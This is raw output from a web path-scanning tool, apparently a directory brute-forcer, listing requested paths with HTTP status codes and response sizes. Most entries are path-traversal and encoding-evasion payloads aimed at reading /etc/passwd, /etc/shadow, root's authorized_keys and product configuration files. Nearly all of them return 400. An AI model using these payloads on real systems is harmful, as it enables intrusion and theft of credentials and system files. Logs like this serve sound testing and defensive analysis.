/..;/                 (Status: 400) [Size: 0]
/%2e%2e//google.com   (Status: 400) [Size: 915]
/%ff/                 (Status: 400) [Size: 277]
/favicon.ico          (Status: 200) [Size: 14886]
/index.html           (Status: 200) [Size: 1491]
/manifest.json        (Status: 200) [Size: 315]
/soap/                (Status: 200) [Size: 0]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 915]
/file.php%80          (Status: 400) [Size: 284]
/index.html           (Status: 200) [Size: 1491]
/file.php%ff          (Status: 400) [Size: 284]
/page1-%bf%bf         (Status: 400) [Size: 285]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 915]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 915]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
/lua.lsp%80           (Status: 400) [Size: 283]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 915]
//a\..\..\muster.db   (Status: 400) [Size: 0]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 915]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 915]
//../agc/bp.pl        (Status: 400) [Size: 915]
